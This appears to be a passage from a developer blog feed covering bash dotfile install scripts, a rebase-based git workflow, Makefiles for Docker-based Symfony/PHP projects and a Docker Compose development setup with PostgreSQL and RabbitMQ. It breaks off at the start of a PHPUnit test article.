│ ├── config/
│ ├── install.sh
│ └── README.md
└── install.sh
The root install.sh script is just here to iterate through each package
sub directories, it'll find the local install.sh there and execute it.
Examples of packages I have there are:
.
├── 12-bash/
├── 13-curl/
├── 14-less/
├── 21-git/
├── 22-php/
├── 23-vim/
├── 24-tree/
└── 25-ack/
As for an example of what the inside of a package sub directory looks like:
12-bash/
├── _apt.sh
├── _brew.sh
├── config/
│ ├── bashrc
│ ├── prompt.sh
│ └── shopt.sh
├── install.sh
└── README.md
The role of the package's install.sh script is to:
_<package-manager>.sh script (apt for Ubuntu, brew for macOS)~/.configFor instance, here's the install.sh for bash:
#!/usr/bin/env bash
# File: /12-bash/install.sh
# ──────────────────────────────────────────────────────────────────────────────
# 💲 bash - GNU Bourne-Again SHell
# ──────────────────────────────────────────────────────────────────────────────
_SSDF_PACKAGE_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]:-$0}")")"
SSDF_ROOT_DIR="$(realpath "${_SSDF_PACKAGE_DIR}/..")"
source "${SSDF_ROOT_DIR}/00-_ssdf/functions.sh"
_SSDF_PACKAGE_NAME="bash"
_ssdf_echo_section_title "Installing ${_SSDF_PACKAGE_NAME}..."
## ─────────────────────────────────────────────────────────────────────────────
## 📦 Call to `./_<package-manager>.sh` script.
## ─────────────────────────────────────────────────────────────────────────────
_ssdf_select_package_manager
_ssdf_install_with_package_manager "${_SSDF_PACKAGE_DIR}" "${SSDF_PACKAGE_MANAGER}"
## ─────────────────────────────────────────────────────────────────────────────
## 🔗 Symbolic links.
## ─────────────────────────────────────────────────────────────────────────────
mkdir -p "${HOME}/.config/bash"
cp -i "${_SSDF_PACKAGE_DIR}/config/bashrc" "${HOME}/.bashrc"
ln -nsf "${_SSDF_PACKAGE_DIR}/config/prompt.sh" "${HOME}/.config/bash/prompt.sh"
ln -nsf "${_SSDF_PACKAGE_DIR}/config/shopt.sh" "${HOME}/.config/bash/shopt.sh"
## ─────────────────────────────────────────────────────────────────────────────
## ➕ Additional config / install
## ─────────────────────────────────────────────────────────────────────────────
if [ -e "${HOME}/.bashrc" ]; then
_ssdf_append_source \
"${HOME}/.bashrc" \
"${HOME}/.config/shell/common.sh"
_ssdf_append_source \
"${HOME}/.config/shell/prompt.local.sh" \
"${HOME}/.config/bash/prompt.sh"
fi
_ssdf_echo_success "${_SSDF_PACKAGE_NAME} installed"
## ─────────────────────────────────────────────────────────────────────────────
## 🧹 Cleaning up local variables
## ─────────────────────────────────────────────────────────────────────────────
_ssdf_unset_envvars
Note: Nothing you need to know or do in this section. But for the curious, here goes nothing!
Initially the scripts would use directly commands and bash syntax, but in 2025 with the need for cross platform compatibility I've decided to create a set of helper functions: they can be found in the ssdf directory (SSDF stands for Super Secret DotFiles).
Inside, we can find helpful documentation:
We can also find some cross platform scripts (sed and grep <x> | sed).
And we can find some functions which I use in the different scripts:
_ssdf_prepend_path "${HOME}/bin" "${HOME}/.local/bin":
Prepends bin and .local/bin to PATH, if they exist and aren't already added_ssdf_append_envvar ~/.config/shell/envvars.local.sh "ACKRC" "${HOME}/.config/ack/ackrc":
Appends to ~/.config/shell/envvars.local.sh the ACKRC with ~/.config/ack/ackrc_ssdf_unset_envvars:
🗑️ Garbage Collectooooooooooooor~ 🎶🤘Last but not least, the quarry (of Creation) folder is a repository of Blocks:
reusable templates that help bootstrap or extend packages.
Let's say I want to add settings for a new package (eg Nerd Fonts), then I'll run:
_SSDF_INPUT_PACKAGE_ID='31' \
_SSDF_INPUT_PACKAGE_NAME='nerd-fonts' \
_SSDF_INPUT_PACKAGE_EMOJI='🤓' \
_SSDF_INPUT_PACKAGE_TITLE='Nerd Fonts' \
_SSDF_INPUT_PACKAGE_SHORT_DESCRIPTION='Iconic font aggregator, collection, and patcher.' \
bash ~/.dotfiles/00-_ssdf/quarry/0a01-new-package/1.0/install.sh
And badabim, badaboom, there's now a 31-nerd-fonts folder with skeleton scripts
and bootstraped README.md.
Fun fact, 00-_ssdf/quarry/0a00-new-quarry-block was used to bootstrap 00-_ssdf/quarry/0a01-new-package.
This whole Quarry of Creation concept is a thing I've been toying with, I'll probably write more about it in the future so stay tuned!
To sum up, I use a git repository to backup my shell settings, so I can then share them accross many devices.
And I also use some plain and simple bash script to restore and install them.
This might seem like a lot, it's been suiting me well for the past decade. I hope this can inspire you to do something of your own!
]]>TL;DR:
git checkout -b FEAT-4423-my-feature from maingit rebase main to updategit merge --no-ff feature back in mainWield the crimson blade of version control, where every commit carves your legacy into the eternal codex of time.
I wrote about my git workflow back in 2014, which really was just @jbenet's 2013 simple git branching model.
I very much like this workflow as I still use it, a decade after!
In this article, we'll explore some of the subtleties I've discovered along the way.
Whenever a change (feature, bug fix, etc) needs to be made,
create a new branch from an up-to-date main:
# Update main
git checkout main
git pull --rebase
# Create new branch
git checkout -b FEAT-4423-my-feature
Super Secret Tip 1: establish a direct relationship between code modifications and project tasks, by including the Ticket ID in your branch name. This will allow:
- Automated Integration: like linking the branch, its commits, and its Pull Request to the ticket, enabling synchronisation between the ticket and the pull request status, as well as deployment
- Traceability and Context: trace any code change back to its original purpose, which can be helpful when debugging some issues in the future
Update your branch often with the changes in main:
# Update remote main
git fetch origin
# Get latest main changes
git rebase origin/main
# Update remote feature branch
git push -fu origin FEAT-4423-my-feature
Super Secret Tip 2: Enable git's "Reuse Recorded Resolution" (aka "rerere"), for automatic conflict resolutions:
git config --global rerere.enabled true.This won't solve everything for you, but will save you time when the same conflict happens repeatedly.
The rebase command will move your commits after the ones in the main branch:
main as the foundationSo for example, instead of having branches look like this:
* a1b2c3d - Merged in feature-x (pull request #123) (Dev A)
|\
| * e4f5g6h - Merge main into feature-x (Dev A)
| |\
* | | b7c8d9e - Merged in hotfix-y (pull request #124) (Dev B)
|\| |
| * | f1a2b3c - hotfix for critical bug (Dev B)
| |/
|/|
* | d4e5f6g - Merged in feature-z (pull request #122) (Dev C)
|\ \
| |/
|/|
* | h7i8j9k - refactor database layer (Dev C)
|/
*
With rebase it'd look like that:
* a1b2c3d - Merged in feature-x (pull request #123) (Dev A)
|\
| * e4f5g6h - implement feature x functionality (Dev A)
|/
* b7c8d9e - Merged in hotfix-y (pull request #124) (Dev B)
|\
| * f1a2b3c - hotfix for critical bug (Dev B)
|/
* d4e5f6g - Merged in feature-z (pull request #122) (Dev C)
|\
| * h7i8j9k - refactor database layer (Dev C)
|/
*
As you can see each feature is now a clean line of commits, making it easy to see what each feature contributed.
The linear, readable history allows us to identify merge commits we might want to revert, when we want to roll back a feature.
Super Secret Tip 3: To display branches with
git lg, set the following alias in your git config:[alias] # Logs history in a graph format with colours: # * abbreviated commit hash in red # * branch and tag names in cyan # * commit title in white # * author name in yellow # * author date in green (format: `Mon, 02 Jan 2006 15:04:05 +0000`) lg = log --graph --pretty=tformat:'%Cred%h%Creset -%C(cyan)%d %Creset%s (%C(yellow)%an%Creset %Cgreen%aD%Creset)' --abbrev-commit
Once tests pass, code quality checks are green, code review is approved, and overall the changes in the branch are production ready, you can finally merge it back to main:
# Update main
git checkout main
git pull --rebase origin/main
# Double check you had the latest changes
git checkout -
git rebase main
## ⚠️ If there are new changes from main, redo all checks (test, code quality, etc)
# Merge your branch in main
git checkout main
git merge --no-fast-forward FEAT-4423-my-feature
The --no-fast-forward (--no-ff) option will force git to create a merge commit,
which then makes it simple to undo a feature, using git revert -m 1 <merge-commit-hash>
(this will create a reverse diff of all the changes introduced by the merge).
Note: Updated on 2026-02-23.
For a Docker-based Symfony project, without Make, typing commands like running tests can quickly become cumbersome:
docker compose exec app php vendor/bin/phpunit --testdox
Make allows you to define a list of "rules" that provide:
make phpunit)make console env=prod)make to list available rules)make app-qa is equivalent to make composer-dump; make cs-check; make phpstan; make rector-check; make phpunit)With Make, the previous example becomes:
make phpunit arg=--testdox
In this article, I'm sharing the Makefiles I use for my Symfony / PHP projects.
Here are the rules I usually define:
# 🐳 Docker related rules
## Build the Docker images and start the services
make docker-init
## Check the services logs
make docker-compose arg='logs --tail=0 --follow'
## Stop the services
make docker-down
## Open interactive shell in container
make docker-bash
# 🐘 Project related rules
## Install composer dependencies
make composer-install
## Run the Symfony console
make console arg='cache:clear'
### To change the environment
make console env=prod arg='cache:clear'
# 🛂 Quality Assurance related rules
## Run composer-dump, phpstan, php-cs-fixer (check), rector (check) and phpunit
make app-qa
## To just run phpstan
make phpstan-analyze
## To just run php-cs-fixer check
make cs-check
## To just run phpunit
make phpunit
### To display technical specifications:
make phpunit arg='--testdox'
### To just run Integration tests:
make phpunit arg='./tests/Integration'
### To just run Unit tests:
make phpunit arg='./tests/Unit'
# Run php-cs-fixer fix (with Swiss Knife for namespaces)
make cs-fix
# Discover everything you can do
make
Here's the Makefile I use in Docker-based Symfony projects, which use a database
(with Docker Compose):
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Docker containers
PHP_SERVICE = app
# Executables
COMPOSER = docker compose exec $(PHP_SERVICE) composer
CONSOLE = docker compose exec -e APP_ENV=$(env) $(PHP_SERVICE) php bin/console
PHPUNIT = docker compose exec $(PHP_SERVICE) php vendor/bin/phpunit
PHP_CS_FIXER = docker compose exec $(PHP_SERVICE) php vendor/bin/php-cs-fixer
PHPSTAN = docker compose exec $(PHP_SERVICE) php vendor/bin/phpstan --memory-limit=256M
RECTOR = docker compose exec $(PHP_SERVICE) php vendor/bin/rector
SWISS_KNIFE = docker compose exec $(PHP_SERVICE) php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐳 The Symfony Docker Makefile 🐳 🎵 ——————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows to add command and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows to set APP_ENV environment variable (default: test), example: make console env='prod' arg='cache:warmup'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— Docker 🐳 ————————————————————————————————————————————————————————————————
docker: ## Runs Docker (arg, eg `arg='compose logs --tail=0 --follow'`)
@docker $(arg)
docker-compose: ## Runs Docker Compose (arg, eg `arg='logs --tail=0 --follow'`)
@docker compose $(arg)
docker-init: ## Builds the Docker images and starts the services in detached mode (no logs)
@docker compose build --pull
@docker compose up --detach
docker-down: ## Stops the services
@docker compose down --remove-orphans
docker-bash: ## Opens a (bash) shell in the container
@docker compose exec $(PHP_SERVICE) bash
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Install dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
console: ## Runs bin/console (arg, eg `arg='cache:clear'`) (env, eg `env=prod`)
@$(CONSOLE) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@docker compose exec $(PHP_SERVICE) sh bin/sfcc-if-stale.sh test
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install / resetting (Docker build, up, etc)
@echo ''
@echo ' // Stopping docker services...'
@$(MAKE) docker-down
@echo ''
@echo ' // Starting docker services...'
@$(MAKE) docker-init
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-clear: ## Clears the Symfony cache (env, eg `env='prod'`)
@$(CONSOLE) cache:clear
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
The phpunit rule calls a script that clears the Symfony cache only when stale,
since unlike dev, the test environment doesn't auto-invalidate on source changes:
#!/usr/bin/env bash
# File: /apps/qa/bin/sfcc-if-stale.sh
# ──────────────────────────────────────────────────────────────────────────────
# Symfony cache clear, but only if it's stale.
#
# Unlike dev, test and prod environments don't auto-invalidate cache when source
# files change. Changes to services, routes, Twig templates, Doctrine mappings,
# or environment variables all require a cache clear.
#
# This script detects stale cache by comparing modification times of src/,
# config/, and .env* files against the cache directory.
#
# Usage:
#
# ```shell
# bin/clear-cache-if-stale.sh
# bin/clear-cache-if-stale.sh prod
# ```
#
# Arguments:
#
# 1. `env`: Symfony environment, defaults to `test`
# ──────────────────────────────────────────────────────────────────────────────
_CLEAR_CACHE_ENV=${1:-test}
_CLEAR_CACHE_DIR="var/cache/${_CLEAR_CACHE_ENV}"
if [ ! -d "${_CLEAR_CACHE_DIR}" ]; then
echo " // Symfony cache directory does not exist, clearing..."
php bin/console cache:clear --env="${_CLEAR_CACHE_ENV}"
exit 0
fi
if [ -n "$(find src config .env* -newer "${_CLEAR_CACHE_DIR}" -print -quit 2>/dev/null)" ]; then
echo " // Symfony cache stale, clearing cache..."
php bin/console cache:clear --env="${_CLEAR_CACHE_ENV}"
exit 0
fi
echo " // Symfony cache is up to date"
If your project doesn't have a database (or services), and therefore relies on Docker directly (without Docker Compose), here's what it could look like:
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Executables (local)
DOCKER_RUN = docker run -it -v "$(PWD)":/app --user $(shell id -u):$(shell id -g)
# Docker containers
PHP_SERVICE = app
PHP_CONT = $(DOCKER_RUN) $(PHP_SERVICE)
# Executables
COMPOSER = $(PHP_CONT) composer
CONSOLE = $(DOCKER_RUN) -e APP_ENV=$(env) $(PHP_SERVICE) php bin/console
PHPUNIT = $(PHP_CONT) php vendor/bin/phpunit
PHP_CS_FIXER = $(PHP_CONT) php vendor/bin/php-cs-fixer
PHPSTAN = $(PHP_CONT) php vendor/bin/phpstan --memory-limit=256M
RECTOR = $(PHP_CONT) php vendor/bin/rector
SWISS_KNIFE = $(PHP_CONT) php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐳 The Symfony Docker Makefile 🐳 🎵 ——————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows to add command and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows to set APP_ENV environment variable (default: test), example: make console env='prod' arg='cache:warmup'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— Docker 🐳 ————————————————————————————————————————————————————————————————
docker-init: ## Builds the Docker image
@docker build -t $(PHP_SERVICE) .
docker-bash: ## Opens a (bash) shell in the container
@$(DOCKER_RUN) $(PHP_SERVICE) bash
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Install dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
console: ## Runs bin/console (arg, eg `arg='cache:clear'`) (env, eg `env=prod`)
@$(CONSOLE) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install
@echo ''
@echo ' // Building docker image...'
@$(MAKE) docker-init
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
For pure PHP projects without Symfony,
that don't run in Docker Containers, the Makefile can look like this:
# Parameters (optional)
# * `arg`: arbitrary arguments to pass to rules (default: none)
# * `env`: used to set `APP_ENV` (default: `test`)
arg ?=
env ?= test
# Executables
PHP = php
COMPOSER = composer
PHPUNIT = php vendor/bin/phpunit
PHP_CS_FIXER = php vendor/bin/php-cs-fixer
PHPSTAN = php vendor/bin/phpstan --memory-limit=256M
RECTOR = php vendor/bin/rector
SWISS_KNIFE = php vendor/bin/swiss-knife
# Misc
.DEFAULT_GOAL = help
.PHONY: *
## —— 🎵 🐘 The Pure PHP Makefile 🐘 🎵 ——————————————————————————————————————
## Based on https://github.com/dunglas/symfony-docker
## (arg) denotes the possibility to pass "arg=" parameter to the target
## this allows to add command and options, example: make composer arg='dump --optimize'
## (env) denotes the possibility to pass "env=" parameter to the target
## this allows to set APP_ENV environment variable (default: test), example: make php env='prod' arg='script.php'
help: ## Outputs this help screen
@grep -E '(^[a-zA-Z0-9\./_-]+:.*?##.*$$)|(^##)' $(MAKEFILE_LIST) \
| awk 'BEGIN {FS = ":.*?## "}{printf "\033[32m%-30s\033[0m %s\n", $$1, $$2}' \
| sed -e 's/\[32m##/[33m/'
## —— PHP 🐘 ———————————————————————————————————————————————————————————————————
composer: ## Runs Composer (arg, eg `arg='outdated'`)
@$(COMPOSER) $(arg)
composer-install: ## Install dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) install --optimize-autoloader $(arg)
composer-update: ## Updates dependencies (arg, eg `arg='--no-dev'`)
@$(COMPOSER) update --optimize-autoloader $(arg)
composer-dump: ## Dumps autoloader (arg, eg `arg='--classmap-authoritative'`)
@$(COMPOSER) dump-autoload --optimize --strict-psr --strict-ambiguous $(arg)
php: ## Runs PHP (arg, eg `arg='script.php'`) (env, eg `env=prod`)
@APP_ENV=$(env) $(PHP) $(arg)
cs-check: ## Checks CS with PHP-CS-Fixer (arg, eg `arg='./src'`)
@$(PHP_CS_FIXER) check --verbose $(arg)
cs-fix: ## Fixes CS with Swiss Knife and PHP-CS-Fixer
@$(SWISS_KNIFE) namespace-to-psr-4 src --namespace-root 'App\\'
@$(SWISS_KNIFE) namespace-to-psr-4 tests --namespace-root 'App\\Tests\\'
@$(PHP_CS_FIXER) fix --verbose $(arg)
phpstan: ## Runs phpstan (arg, eg `arg='clear-result-cache'`)
@$(PHPSTAN) $(arg)
phpstan-analyze: ## Static Analysis with phpstan (arg, eg `arg='./src/'`)
@$(PHPSTAN) analyze $(arg)
swiss-knife: ## Automated refactorings with Swiss Knife (arg, eg `arg='namespace-to-psr-4 src --namespace-root \'App\\\''`)
@$(SWISS_KNIFE) $(arg)
phpunit: ## Runs the tests with PHPUnit (arg, eg `arg='./tests/Unit'`)
@$(PHPUNIT) $(arg)
rector-fix: ## Automated refactorings with Rector (arg, eg `arg='--clear-cache'`)
@$(RECTOR) $(arg)
rector-check: ## Refactoring checks with Rector
@$(RECTOR) process --dry-run
## —— App 📱 ———————————————————————————————————————————————————————————————————
app-init: ## First install
@echo ''
@echo ' // Installing Composer dependencies...'
@$(MAKE) composer-install
@echo ''
@echo ' [OK] App initialized'
app-qa: ## Runs full QA pipeline (composer-dump, cs-check, phpstan, rector-check, phpunit)
@echo ''
@echo ' // Running composer dump...'
@$(MAKE) composer-dump
@echo ''
@echo ' // Running PHP CS Fixer...'
@$(MAKE) cs-check
@echo ''
@echo ' // Running PHPStan...'
@$(MAKE) phpstan
@echo ''
@echo ' // Running Rector...'
@$(MAKE) rector-check
@echo ''
@echo ' // Running PHPUnit...'
@$(MAKE) phpunit
@echo ''
@echo ' [OK] QA done'
With this, you can streamline your development workflow across projects and focus on writing code instead of remembering complex Docker commands.
]]>Note: I took massive inspiration from Kevin Dunglas' Symfony Docker Makefile.
I'm describing here a solution that ensures consistent development environment, to run the project locally with just a few commands, without having to worry about:
database / search engine / messaging queue / services setup
The following Dockerfile will build an image with:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: PHP, bash, Composer, PostgreSQL, Symfony CLI
###
FROM php:8.3-cli-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * bash for shell access and scripting
# * postgresql for the database
# * zip for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
bash \
libzip-dev \
postgresql-dev \
zip \
&& docker-php-ext-install \
bcmath \
zip \
pdo_pgsql
# Copy Symfony CLI binary from image
# _Note_: Avoid using Symfony CLI installer, use Docker image instead
# See: https://github.com/symfony-cli/symfony-cli/issues/195#issuecomment-1273269735
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=ghcr.io/symfony-cli/symfony-cli:v5 /usr/local/bin/symfony /usr/local/bin/symfony
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /app
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
You can check the validity of your Dockerfile syntax here: hadolint
Here's how to build the image, and then run the container:
Note:
-v "$(PWD)":/appmounts current directory for live code changes.
docker build -t app .
# Run with interactive shell
docker run --rm -it -v "$(PWD)":/app app bash
# Run composer
docker run --rm -it -v "$(PWD)":/app app symfony composer install -o
# Run symfony's console
docker run --rm -it -v "$(PWD)":/app -e APP_ENV=prod app symfony console
# Run PHPUnit, phpstan, PHP CS Fixer
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/phpunit
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/phpstan analyze
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/php-cs-fixer check --verbose
docker run --rm -it -v "$(PWD)":/app app symfony php vendor/bin/php-cs-fixer fix --verbose
# Start Symfony CLI's web server
docker run --rm -it -v "$(PWD)":/app -p 8000:8000 app symfony server:start --port=8000 --host=0.0.0.0
When using COPY . . in Dockerfile, it's useful to limit what's going to be copied, with a .dockerignore:
## composer
vendor
## git
.git/
## friendsofphp/php-cs-fixer
.php-cs-fixer.php
.php-cs-fixer.cache
## phpstan/phpstan
phpstan.neon
## phpunit/phpunit
phpunit.xml
.phpunit.cache
## symfony/framework-bundle
.env.local
.env.local.php
.env.*.local
var/cache/
var/log/
When the PHP application relies on other services,
such as a database (eg PostgreSQL), search engine (eg Elasticsearch), or message queue (eg RabbitMQ),
having a compose.yaml file will make the development experience much smoother
by handling services, networking, and volumes automatically:
services:
app:
build: .
# Mount current directory into container for live code changes
volumes:
- .:/app
# Database should be started first
depends_on:
- db
ports:
- "8000:8000"
command: symfony serve --no-tls --port=8000 --listen-ip=0.0.0.0
db:
image: postgres:${POSTGRES_VERSION:-16}-alpine
environment:
POSTGRES_DB: ${POSTGRES_DB:-app}
POSTGRES_PASSWORD: ${POSTGRES_PASSWORD:-ChangeMe}
POSTGRES_USER: ${POSTGRES_USER:-app}
# Persist database data between container restarts
volumes:
- db-data:/var/lib/postgresql/data:rw
# Port mapping to avoid conflict with locally running PostgreSQL
ports:
- "5433:5432"
# Define the db-data volume used above
volumes:
db-data:
Now usage commands will be a bit different:
# Build docker images
docker compose build --pull
# Start services (no logs)
docker compose up --detach
# Show live logs
docker compose logs --tail=0 --follow
# Stop services
docker compose down --remove-orphans
# Run with interactive shell
docker compose exec app bash
# Run composer
docker compose exec app symfony composer
# Run symfony's console
docker compose exec -e APP_ENV=prod app symfony console
# Run PHPUnit, phpstan, PHP CS Fixer
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/phpunit
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/phpstan analyze
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/php-cs-fixer check --verbose
docker compose exec -e APP_ENV=prod app symfony php vendor/bin/php-cs-fixer fix --verbose
To setup SQLite, you'll need to modify Dockerfile:
RUN apk add --update --no-cache \
...
sqlite \
&& docker-php-ext-install \
...
pdo_sqlite
As well as compose.yaml:
services:
app:
...
volumes:
...
# Mount SQLite database directory to persist data
- sqlite-data:/app/var/data
volumes:
...
sqlite-data:
This is assuming your SQLite database file is located in the projects' var/data folder.
Make sure to set up the following environment varaible in .env:
DATABASE_URL="sqlite:///%kernel.project_dir%/var/data/database.sqlite"
For RabbitMQ, modify Dockerfile:
RUN apk add --update --no-cache \
...
rabbitmq-c-dev \
&& docker-php-ext-install \
...
sockets \
&& pecl install amqp \
&& docker-php-ext-enable amqp
Also compose.yaml:
services:
app:
...
depends_on:
...
- rabbitmq
rabbitmq:
image: rabbitmq:${RABBITMQ_VERSION:-3.13}-management-alpine
environment:
RABBITMQ_DEFAULT_USER: ${RABBITMQ_USER:-app}
RABBITMQ_DEFAULT_PASS: ${RABBITMQ_PASSWORD:-ChangeMe}
# Persist RabbitMQ data between container restarts
volumes:
- rabbitmq-data:/var/lib/rabbitmq:rw
ports:
# Port mapping to avoid conflict with locally running RabbitMQ
- "5673:5672"
# Management UI port
- "15673:15672"
volumes:
...
rabbitmq-data:
Again, make sure to set up the following environment varaible in .env:
RABBITMQ_URL="amqp://app:ChangeMe@rabbitmq:5672/"
The RabbitMQ management interface will be available at http://localhost:15673, with the credentials defined in the environment variables.
Here's a list of helpful commands to maintain the images and containers:
docker images: lists images
docker images --filter dangling=true: lists untagged / unused imagesdocker container ls: lists running containers
docker container ls -a: lists running and stopped containersdocker system prune: removes dangling containers, networks and images
docker system prune --volumes: removes dangling containers, networks, volumes and imagesdocker history <image>: Inspects layers of an imageWith this, we can finally write bugs once, and run them everywhere!
]]>Edit: brought up to date on 2026-02-27.
Forge battle-tested code, under the hammer of PHPUnit.
Here's a unit test for a Username value object:
<?php
declare(strict_types=1);
namespace App\Tests\Unit;
use PHPUnit\Framework\Attributes\CoversClass;
use PHPUnit\Framework\Attributes\DataProvider;
use PHPUnit\Framework\Attributes\Small;
use PHPUnit\Framework\Attributes\TestDox;
use PHPUnit\Framework\TestCase;
